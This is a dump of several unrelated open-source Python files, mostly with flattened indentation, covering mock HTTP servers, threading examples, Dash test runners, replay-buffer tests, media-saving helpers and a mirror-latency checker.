mock_server = HTTPServer(("localhost", port), SPARQL11ProtocolStoreMock)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
mock_server_thread = Thread(target=mock_server.serve_forever)
        mock_server_thread.daemon = True
mock_server_thread.start()
print(
"Started mocked sparql endpoint on http://localhost:{port}/".format(
port=port
)
)
return port
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "insert data {<urn:s> <urn:p> <urn:o>}"
res = self.graph.update(query)
print(res)
class SPARQL11ProtocolStoreMock(BaseHTTPRequestHandler):
def do_POST(self):
"""
If the body should be analysed as well, just use:
```
body = self.rfile.read(int(self.headers['Content-Length'])).decode()
print(body)
```
"""
contenttype = self.headers.get("Content-Type")
if self.path == "/query" or self.path == "/query?":
if self.headers.get("Content-Type") == "application/sparql-query":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
elif self.path == "/update" or self.path == "/update?":
if self.headers.get("Content-Type") == "application/sparql-update":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
else:
print("self.path")
print(self.path)
self.send_response(404, "Not Found")
self.end_headers()
self.send_response(200, "OK")
self.end_headers()
return
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(200, "OK")
self.end_headers()
return
if __name__ == "__main__":
unittest.main()
|
ThreadExample.py
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
#
# Copyright (C) James Chapman 2019
#
import queue
import threading
import time
from pythonsnippets.Parallel.ThreadWorker import ThreadWorker
def main():
# Create Queues
waiting_q = queue.Queue()
waiting_lk = threading.Lock()
complete_q = queue.Queue()
complete_lk = threading.Lock()
for i in range(100):
waiting_q.put(i)
# Create and start threads using different methods
worker = ThreadWorker(waiting_q, waiting_lk, complete_q, complete_lk)
thread1 = threading.Thread(target=worker.doStuff, args=())
thread1.start()
# thread2 works because our ThreadWorker class inherits threading.Thread (see class definition)
thread2 = ThreadWorker(waiting_q, waiting_lk, complete_q, complete_lk)
thread2.start()
# Let the threads run for 10 seconds before setting stop event
time.sleep(10)
worker.stop()
thread2.stop()
# Wait for threads to exit.
while (thread1.is_alive() or thread2.is_alive()):
time.sleep(1)
print("Waiting Q size: {0}".format(waiting_q.qsize()))
print("Complete Q size: {0}".format(complete_q.qsize()))
if __name__ == '__main__':
main()
|
start.py
|
import sqlite3 as sqlite
import json
import threading
import uvicorn
import setupDB
from tnChecker import TNChecker
from ethChecker import ETHChecker
with open('config.json') as json_file:
config = json.load(json_file)
def main():
#check db
try:
dbCon = sqlite.connect('gateway.db')
result = dbCon.cursor().execute('SELECT chain, height FROM heights WHERE chain = "TN" or chain = "ETH"').fetchall()
#dbcon.close()
if len(result) == 0:
setupDB.initialisedb(config)
    except Exception:
setupDB.createdb()
setupDB.initialisedb(config)
setupDB.createVerify()
#load and start threads
tn = TNChecker(config)
eth = ETHChecker(config)
ethThread = threading.Thread(target=eth.run)
tnThread = threading.Thread(target=tn.run)
ethThread.start()
tnThread.start()
#start app
uvicorn.run("gateway:app", host="0.0.0.0", port=config["main"]["port"], log_level="info")
main()
|
client.py
|
'''
Client Side code
'''
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
    client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 33000
else:
PORT = int(PORT)
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
application_runners.py
|
from __future__ import print_function
import sys
import os
import uuid
import shlex
import threading
import subprocess
import logging
import runpy
import future.utils as utils
import flask
import requests
from dash.testing.errors import (
NoAppFoundError,
TestingTimeoutError,
ServerCloseError,
)
import dash.testing.wait as wait
logger = logging.getLogger(__name__)
def import_app(app_file, application_name="app"):
"""
Import a dash application from a module.
The import path is in dot notation to the module.
The variable named app will be returned.
:Example:
>>> app = import_app('my_app.app')
Will import the application in module `app` of the package `my_app`.
:param app_file: Path to the app (dot-separated).
:type app_file: str
:param application_name: The name of the dash application instance.
:raise: dash_tests.errors.NoAppFoundError
:return: App from module.
:rtype: dash.Dash
"""
try:
app_module = runpy.run_module(app_file)
app = app_module[application_name]
except KeyError:
logger.exception("the app name cannot be found")
raise NoAppFoundError(
"No dash `app` instance was found in {}".format(app_file)
)
return app
class BaseDashRunner(object):
"""Base context manager class for running applications."""
def __init__(self, keep_open, stop_timeout):
self.port = 8050
self.started = None
self.keep_open = keep_open
self.stop_timeout = stop_timeout
def start(self, *args, **kwargs):
raise NotImplementedError # pragma: no cover
def stop(self):
raise NotImplementedError # pragma: no cover
@staticmethod
def accessible(url):
try:
requests.get(url)
except requests.exceptions.RequestException:
return False
return True
def __call__(self, *args, **kwargs):
return self.start(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, traceback):
if self.started and not self.keep_open:
try:
logger.info("killing the app runner")
self.stop()
except TestingTimeoutError:
raise ServerCloseError(
"Cannot stop server within {}s timeout".format(
self.stop_timeout
)
)
@property
def url(self):
"""the default server url"""
return "http://localhost:{}".format(self.port)
@property
def is_windows(self):
return sys.platform == "win32"
class ThreadedRunner(BaseDashRunner):
"""Runs a dash application in a thread
this is the default flavor to use in dash integration tests
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ThreadedRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
self.thread = None
@staticmethod
def _stop_server():
# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#shutting-down-the-server
stopper = flask.request.environ.get("werkzeug.server.shutdown")
if stopper is None:
raise RuntimeError("Not running with the Werkzeug Server")
stopper()
return "Flask server is shutting down"
# pylint: disable=arguments-differ,C0330
def start(self, app, **kwargs):
"""Start the app server in threading flavor"""
app.server.add_url_rule(
self.stop_route, self.stop_route, self._stop_server
)
def _handle_error():
self._stop_server()
app.server.errorhandler(500)(_handle_error)
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
if "port" not in kwargs:
kwargs["port"] = self.port
else:
self.port = kwargs["port"]
app.run_server(threaded=True, **kwargs)
self.thread = threading.Thread(target=run)
self.thread.daemon = True
try:
self.thread.start()
except RuntimeError: # multiple call on same thread
logger.exception("threaded server failed to start")
self.started = False
self.started = self.thread.is_alive()
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=1)
def stop(self):
requests.get("{}{}".format(self.url, self.stop_route))
wait.until_not(self.thread.is_alive, self.stop_timeout)
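# Hedged usage sketch, not part of the original module: how a test might drive
# the threaded runner as a context manager. `app` is assumed to be a dash.Dash
# instance created elsewhere; the port number is arbitrary.
def _example_threaded_runner_usage(app):  # pragma: no cover
    with ThreadedRunner() as runner:
        runner.start(app, port=8051)
        assert runner.accessible(runner.url)
    # __exit__ stops the server unless keep_open=True was passed.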
class ProcessRunner(BaseDashRunner):
"""Runs a dash application in a waitress-serve subprocess
this flavor is closer to production environment but slower
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ProcessRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app_module, application_name="app", port=8050):
"""Start the server with waitress-serve in process flavor """
entrypoint = "{}:{}.server".format(app_module, application_name)
self.port = port
args = shlex.split(
"waitress-serve --listen=0.0.0.0:{} {}".format(port, entrypoint),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=3)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
def stop(self):
if self.proc:
try:
self.proc.terminate()
if utils.PY3:
# pylint:disable=no-member
_except = subprocess.TimeoutExpired
# pylint: disable=unexpected-keyword-arg
self.proc.communicate(timeout=self.stop_timeout)
else:
_except = OSError
self.proc.communicate()
except _except:
logger.exception(
"subprocess terminate not success, trying to kill "
"the subprocess in a safe manner"
)
self.proc.kill()
self.proc.communicate()
class RRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super(RRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app):
"""Start the server with waitress-serve in process flavor """
# app is a R string chunk
if not (os.path.isfile(app) and os.path.exists(app)):
path = (
"/tmp/app_{}.R".format(uuid.uuid4().hex)
if not self.is_windows
                else os.path.join(
                    os.getenv("TEMP"), "app_{}.R".format(uuid.uuid4().hex)
                )
)
logger.info("RRuner start => app is R code chunk")
logger.info("make a temporay R file for execution=> %s", path)
logger.debug("the content of dashR app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
logger.info("Run dashR app with Rscript => %s", app)
args = shlex.split(
"Rscript {}".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=2)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
|
data_buffer_test.py
|
# Copyright (c) 2019 Horizon Robotics. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing as mp
from collections import namedtuple
import os
import tempfile
from time import sleep
import torch
from absl.testing import parameterized
import alf
from alf.tensor_specs import TensorSpec
from alf.utils.data_buffer import RingBuffer, DataBuffer
from alf.utils.checkpoint_utils import Checkpointer
DataItem = alf.data_structures.namedtuple(
"DataItem", [
"env_id", "x", "o", "reward", "step_type", "batch_info",
"replay_buffer", "rollout_info_field"
],
default_value=())
# Using cpu tensors are needed for running on cuda enabled devices,
# as we are not using the spawn method to start subprocesses.
def get_batch(env_ids, dim, t, x):
batch_size = len(env_ids)
x = torch.as_tensor(x, dtype=torch.float32, device="cpu")
t = torch.as_tensor(t, dtype=torch.int32, device="cpu")
ox = (x * torch.arange(
batch_size, dtype=torch.float32, requires_grad=True,
device="cpu").unsqueeze(1) * torch.arange(
dim, dtype=torch.float32, requires_grad=True,
device="cpu").unsqueeze(0))
a = x * torch.ones(batch_size, dtype=torch.float32, device="cpu")
g = torch.zeros(batch_size, dtype=torch.float32, device="cpu")
# reward function adapted from ReplayBuffer: default_reward_fn
r = torch.where(
torch.abs(a - g) < .05,
torch.zeros(batch_size, dtype=torch.float32, device="cpu"),
-torch.ones(batch_size, dtype=torch.float32, device="cpu"))
return DataItem(
env_id=torch.tensor(env_ids, dtype=torch.int64, device="cpu"),
x=ox,
step_type=t * torch.ones(batch_size, dtype=torch.int32, device="cpu"),
o=dict({
"a": a,
"g": g
}),
reward=r)
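# Illustrative note (not from the original test): get_batch([1, 2, 3], dim=20,
# t=1, x=0.5) returns a DataItem whose x has shape (3, 20), whose step_type,
# reward and "a"/"g" observation entries each have shape (3,), and whose
# env_id equals tensor([1, 2, 3]); every tensor is created on the CPU.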
class RingBufferTest(parameterized.TestCase, alf.test.TestCase):
dim = 20
max_length = 4
num_envs = 8
def __init__(self, *args):
super().__init__(*args)
alf.set_default_device("cpu") # spawn forking is required to use cuda.
self.data_spec = DataItem(
env_id=alf.TensorSpec(shape=(), dtype=torch.int64),
x=alf.TensorSpec(shape=(self.dim, ), dtype=torch.float32),
step_type=alf.TensorSpec(shape=(), dtype=torch.int32),
o=dict({
"a": alf.TensorSpec(shape=(), dtype=torch.float32),
"g": alf.TensorSpec(shape=(), dtype=torch.float32)
}),
reward=alf.TensorSpec(shape=(), dtype=torch.float32))
@parameterized.named_parameters([
('test_sync', False),
('test_async', True),
])
def test_ring_buffer(self, allow_multiprocess):
ring_buffer = RingBuffer(
data_spec=self.data_spec,
num_environments=self.num_envs,
max_length=self.max_length,
allow_multiprocess=allow_multiprocess)
batch1 = get_batch([1, 2, 3, 5, 6], self.dim, t=1, x=0.4)
if not allow_multiprocess:
# enqueue: blocking mode only available under allow_multiprocess
self.assertRaises(
AssertionError,
ring_buffer.enqueue,
batch1,
env_ids=batch1.env_id,
blocking=True)
# Test dequeque()
for t in range(2, 10):
batch1 = get_batch([1, 2, 3, 5, 6], self.dim, t=t, x=0.4)
# test that the created batch has gradients
self.assertTrue(batch1.x.requires_grad)
ring_buffer.enqueue(batch1, batch1.env_id)
if not allow_multiprocess:
# dequeue: blocking mode only available under allow_multiprocess
self.assertRaises(
AssertionError,
ring_buffer.dequeue,
env_ids=batch1.env_id,
blocking=True)
# Exception because some environments do not have data
self.assertRaises(AssertionError, ring_buffer.dequeue)
batch = ring_buffer.dequeue(env_ids=batch1.env_id)
self.assertEqual(batch.step_type, torch.tensor([6] * 5))
# test that RingBuffer detaches gradients of inputs
self.assertFalse(batch.x.requires_grad)
batch = ring_buffer.dequeue(env_ids=batch1.env_id)
self.assertEqual(batch.step_type, torch.tensor([7] * 5))
batch = ring_buffer.dequeue(env_ids=torch.tensor([1, 2]))
self.assertEqual(batch.step_type, torch.tensor([8] * 2))
batch = ring_buffer.dequeue(env_ids=batch1.env_id)
self.assertEqual(batch.step_type,
torch.tensor([[9], [9], [8], [8], [8]]))
# Exception because some environments do not have data
self.assertRaises(
AssertionError, ring_buffer.dequeue, env_ids=batch1.env_id)
# Test dequeue multiple
ring_buffer.clear()
for t in range(5, 10):
batch1 = get_batch([1, 2, 3, 5, 6], self.dim, t=t, x=0.4)
# test that the created batch has gradients
ring_buffer.enqueue(batch1, batch1.env_id)
# Normal dequeue in the middle of the ring buffer
batch = ring_buffer.dequeue(env_ids=batch1.env_id, n=2)
self.assertEqual(batch.step_type, torch.tensor([[6, 7]] * 5))
# This dequeue crosses the end of the ring buffer
batch = ring_buffer.dequeue(env_ids=batch1.env_id, n=2)
self.assertEqual(batch.step_type, torch.tensor([[8, 9]] * 5))
# Test remove_up_to
ring_buffer.remove_up_to(4)
for t in range(6, 10):
batch2 = get_batch(range(0, 8), self.dim, t=t, x=0.4)
ring_buffer.enqueue(batch2)
prev_size = ring_buffer._current_size.clone()
prev_pos = ring_buffer._current_pos.clone()
ring_buffer.remove_up_to(2)
self.assertEqual(prev_size - 2, ring_buffer._current_size)
# shouldn't change last data pos
self.assertEqual(prev_pos, ring_buffer._current_pos)
# remove_up_to more than there are elements shouldn't raise error
ring_buffer.remove_up_to(3)
self.assertEqual(ring_buffer._current_size, torch.tensor([0] * 8))
if allow_multiprocess:
# Test block on dequeue without enough data
def delayed_enqueue(ring_buffer, batch):
alf.set_default_device("cpu")
sleep(0.04)
ring_buffer.enqueue(batch, batch.env_id)
p = mp.Process(
target=delayed_enqueue,
args=(ring_buffer,
alf.nest.map_structure(lambda x: x.cpu(), batch1)))
p.start()
batch = ring_buffer.dequeue(env_ids=batch1.env_id, blocking=True)
self.assertEqual(batch.step_type, torch.tensor([9] * 2))
# Test block on enqueue without free space
ring_buffer.clear()
for t in range(6, 10):
batch2 = get_batch(range(0, 8), self.dim, t=t, x=0.4)
ring_buffer.enqueue(batch2)
def delayed_dequeue():
# cpu tensor on subprocess. Otherwise, spawn method is needed.
alf.set_default_device("cpu")
sleep(0.04)
ring_buffer.dequeue() # 6(deleted), 7, 8, 9
sleep(0.04) # 10, 7, 8, 9
ring_buffer.dequeue() # 10, 7(deleted), 8, 9
p = mp.Process(target=delayed_dequeue)
p.start()
batch2 = get_batch(range(0, 8), self.dim, t=10, x=0.4)
ring_buffer.enqueue(batch2, blocking=True)
p.join()
self.assertEqual(ring_buffer._current_size[0], torch.tensor([3]))
# Test stop queue event
def blocking_dequeue(ring_buffer):
ring_buffer.dequeue(blocking=True)
p = mp.Process(target=blocking_dequeue, args=(ring_buffer, ))
ring_buffer.clear()
p.start()
sleep(0.02) # for subprocess to enter while loop
ring_buffer.stop()
p.join()
self.assertEqual(
ring_buffer.dequeue(env_ids=batch1.env_id, blocking=True),
None)
ring_buffer.revive()
for t in range(6, 10):
batch2 = get_batch(range(0, 8), self.dim, t=t, x=0.4)
self.assertEqual(
ring_buffer.enqueue(batch2, blocking=True), True)
ring_buffer.stop()
self.assertEqual(ring_buffer.enqueue(batch2, blocking=True), False)
class DataBufferTest(alf.test.TestCase):
def test_data_buffer(self):
dim = 20
capacity = 256
data_spec = (TensorSpec(shape=()), TensorSpec(shape=(dim // 3 - 1, )),
TensorSpec(shape=(dim - dim // 3, )))
data_buffer = DataBuffer(data_spec=data_spec, capacity=capacity)
def _get_batch(batch_size):
x = torch.randn(batch_size, dim, requires_grad=True)
x = (x[:, 0], x[:, 1:dim // 3], x[..., dim // 3:])
return x
data_buffer.add_batch(_get_batch(100))
self.assertEqual(int(data_buffer.current_size), 100)
batch = _get_batch(1000)
# test that the created batch has gradients
self.assertTrue(batch[0].requires_grad)
data_buffer.add_batch(batch)
ret = data_buffer.get_batch(2)
# test that DataBuffer detaches gradients of inputs
self.assertFalse(ret[0].requires_grad)
self.assertEqual(int(data_buffer.current_size), capacity)
ret = data_buffer.get_batch_by_indices(torch.arange(capacity))
self.assertEqual(ret[0], batch[0][-capacity:])
self.assertEqual(ret[1], batch[1][-capacity:])
self.assertEqual(ret[2], batch[2][-capacity:])
batch = _get_batch(100)
data_buffer.add_batch(batch)
ret = data_buffer.get_batch_by_indices(
torch.arange(data_buffer.current_size - 100,
data_buffer.current_size))
self.assertEqual(ret[0], batch[0])
self.assertEqual(ret[1], batch[1])
self.assertEqual(ret[2], batch[2][-capacity:])
# Test checkpoint working
with tempfile.TemporaryDirectory() as checkpoint_directory:
checkpoint = Checkpointer(
checkpoint_directory, data_buffer=data_buffer)
checkpoint.save(10)
data_buffer = DataBuffer(data_spec=data_spec, capacity=capacity)
checkpoint = Checkpointer(
checkpoint_directory, data_buffer=data_buffer)
global_step = checkpoint.load()
self.assertEqual(global_step, 10)
ret = data_buffer.get_batch_by_indices(
torch.arange(data_buffer.current_size - 100,
data_buffer.current_size))
self.assertEqual(ret[0], batch[0])
self.assertEqual(ret[1], batch[1])
self.assertEqual(ret[2], batch[2][-capacity:])
data_buffer.clear()
self.assertEqual(int(data_buffer.current_size), 0)
if __name__ == '__main__':
alf.test.main()
|
media.py
|
from PIL import Image
from typing import List
from machin.parallel import get_context
import os
import numpy as np
import moviepy.editor as mpy
import matplotlib.pyplot as plt
def show_image(
image: np.ndarray,
show_normalized: bool = True,
pause_time: float = 0.01,
title: str = "",
):
"""
Use matplotlib to show a single image. You may repeatedly call this method
with the same ``title`` argument to show a video or a dynamically changing
image.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with ``dtype``
= any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
show_normalized: Show normalized image alongside the original one.
pause_time: Pause time between displaying current image and the next
one.
title: Title of the display window.
"""
if np.issubdtype(image.dtype, np.integer):
        image = image.astype(np.float64) / 255
fig = plt.figure(title, clear=True)
fig.canvas.manager.set_window_title(title)
if show_normalized:
ax = fig.add_subplot(1, 2, 1)
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
ax2 = fig.add_subplot(1, 2, 2)
ax2.set_facecolor((0.0, 0.0, 0.0))
pix_range = (np.max(image) - np.min(image)) + 1e-6
ax2.imshow((image - np.min(image)) / pix_range, vmin=0, vmax=1)
plt.pause(pause_time)
else:
ax = fig.add_subplot(1, 1, 1)
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
plt.pause(pause_time)
def create_video(
frames: List[np.ndarray],
path: str,
filename: str,
extension: str = ".gif",
fps: int = 15,
):
"""
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
"""
if frames:
for f in range(len(frames)):
if np.issubdtype(frames[f].dtype, np.integer):
frames[f] = frames[f].astype(np.uint8)
elif np.issubdtype(frames[f].dtype, np.floating):
frames[f] = (frames[f] * 255).astype(np.uint8)
if frames[f].ndim == 2:
# consider as a grey scale image
frames[f] = np.repeat(frames[f][:, :, np.newaxis], 3, axis=2)
clip = mpy.ImageSequenceClip(frames, fps=fps)
if extension.lower() == ".gif":
clip.write_gif(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
logger=None,
)
else:
clip.write_videofile(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
logger=None,
)
clip.close()
def create_video_subproc(
frames: List[np.ndarray],
path: str,
filename: str,
extension: str = ".gif",
fps: int = 15,
daemon: bool = True,
):
"""
Create video with a subprocess, since it takes a lot of time for ``moviepy``
to encode the video file.
See Also:
:func:`.create_video`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
def wait():
pass
if frames:
p = get_context("spawn").Process(
target=create_video, args=(frames, path, filename, extension, fps)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
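# Hedged usage sketch, not part of the original module: encode a short
# random-noise clip in a background process and block until it finishes.
# The output directory is hypothetical.
def _example_create_video_subproc_usage(out_dir="/tmp"):  # pragma: no cover
    frames = [np.random.rand(64, 64, 3) for _ in range(30)]  # floats in [0, 1]
    wait = create_video_subproc(frames, out_dir, "demo", extension=".gif", fps=15)
    # ... other work can run here while the subprocess encodes ...
    wait()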
def numpy_array_to_pil_image(image: np.ndarray):
if np.issubdtype(image.dtype, np.integer):
image = image.astype(np.uint8)
elif np.issubdtype(image.dtype, np.floating):
image = (image * 255).astype(np.uint8)
if image.ndim == 2:
# consider as a grey scale image
image = np.repeat(image[:, :, np.newaxis], 3, axis=2)
image = Image.fromarray(image)
return image
def create_image(image: np.ndarray, path: str, filename: str, extension: str = ".png"):
"""
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
"""
image = numpy_array_to_pil_image(image)
image.save(os.path.join(path, filename + extension))
def create_image_subproc(
    image: np.ndarray,
path: str,
filename: str,
extension: str = ".png",
daemon: bool = True,
):
"""
Create image with a subprocess.
See Also:
:func:`.create_image`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
p = get_context("spawn").Process(
target=create_image, args=(image, path, filename, extension)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
|
fastest-infra-wheel-mirror.py
|
#!/usr/bin/env python
#
# Copyright 2016, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# (c) 2016, Jesse Pretorius <jesse.pretorius@rackspace.co.uk>
#
# Based on the mirror test script posted at
# http://code.activestate.com/recipes/284631-a-python-script-to-test-download-mirrors/
import platform
import Queue
import re
import threading
import time
import urllib
HTTP_TIMEOUT = 10.0 # Max. seconds to wait for a response
HTTP_TITLE = "Wheel Index" # HTTP Title to look for to validate the page
MAX_THREADS = 10
MIRROR_LIST = ["http://mirror.dfw.rax.openstack.org/wheel/",
"http://mirror.ord.rax.openstack.org/wheel/",
"http://mirror.iad.rax.openstack.org/wheel/",
"http://mirror.gra1.ovh.openstack.org/wheel/",
"http://mirror.bhs1.ovh.openstack.org/wheel/",
"http://mirror.sjc1.bluebox.openstack.org/wheel/",
"http://mirror.nyj01.internap.openstack.org/wheel/",
"http://mirror.cloud1.osic.openstack.org/wheel/"]
def TestUrl(workQueue, resultQueue):
'''Worker thread procedure.
Test how long it takes to return the mirror index page,
then return the results into resultQueue.
'''
def SubthreadProc(url, result):
'''Subthread procedure.
Actually get the mirror index page in a subthread, so that we can time
out using join rather than wait for a very slow server. Passing in a
list for result lets us simulate pass-by-reference, since callers
cannot get the return code from a Python thread.
'''
startTime = time.time()
try:
data = urllib.urlopen(url).read()
except Exception:
# Could be a socket error or an HTTP error--either way, we
# don't care--it's a failure to us.
result.append(-1)
else:
if not CheckTitle(data):
result.append(-1)
else:
elapsed = int((time.time() - startTime) * 1000)
result.append(elapsed)
def CheckTitle(html):
'''Check that the HTML title is the expected value.
Check the HTML returned for the presence of a specified
title. This caters for a situation where a service provider
may be redirecting DNS resolution failures to a web search
page, or where the returned data is invalid in some other
way.
'''
titleRegex = re.compile("<title>(.+?)</title>")
try:
title = titleRegex.search(html).group(1)
except Exception:
# If there is no match, then we consider it a failure.
            return False
else:
if title == HTTP_TITLE:
return True
else:
return False
while 1:
# Continue pulling data from the work queue until it's empty
try:
url = workQueue.get(0)
except Queue.Empty:
# work queue is empty--exit the thread proc.
return
# Create a single subthread to do the actual work
result = []
subThread = threading.Thread(target=SubthreadProc, args=(url, result))
# Daemonize the subthread so that even if a few are hanging
# around when the process is done, the process will exit.
subThread.setDaemon(True)
# Run the subthread and wait for it to finish, or time out
subThread.start()
subThread.join(HTTP_TIMEOUT)
if [] == result:
# Subthread hasn't give a result yet. Consider it timed out.
resultQueue.put((url, "TIMEOUT"))
elif -1 == result[0]:
# Subthread returned an error from geturl.
resultQueue.put((url, "FAILED"))
else:
# Subthread returned a time. Store it.
resultQueue.put((url, result[0]))
# Set the number of threads to use
numThreads = min(MAX_THREADS, len(MIRROR_LIST))
# Build a queue to feed the worker threads
workQueue = Queue.Queue()
for url in MIRROR_LIST:
# Build the complete URL
distro = platform.linux_distribution()[0].lower()
version = platform.linux_distribution()[1]
architecture = platform.machine()
fullUrl = url + distro + "-" + version + "-" + architecture + "/"
workQueue.put(fullUrl)
workers = []
resultQueue = Queue.Queue()
# Create worker threads to load-balance the retrieval
for threadNum in range(0, numThreads):
workers.append(threading.Thread(target=TestUrl,
args=(workQueue, resultQueue)))
workers[-1].start()
# Wait for all the workers to finish
for w in workers:
w.join()
# Separate the successes from failures
timings = []
failures = []
while not resultQueue.empty():
url, result = resultQueue.get(0)
if isinstance(result, str):
failures.append((result, url))
else:
timings.append((result, url))
# Sort by increasing time or result string
timings.sort()
failures.sort()
# If all results are failed, then exit silently
if len(timings) > 0:
# Print out the fastest mirror URL
print(timings[0][1])
|
testing.py
|
#############################################################################
#
# Copyright (c) 2004-2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Various test-support utility functions
"""
try:
# Python 3
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.request import urlopen
except ImportError:
# Python 2
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from urllib2 import urlopen
import errno
import logging
from multiprocessing import Process
import os
import pkg_resources
import random
import re
import shutil
import socket
import subprocess
import sys
import tempfile
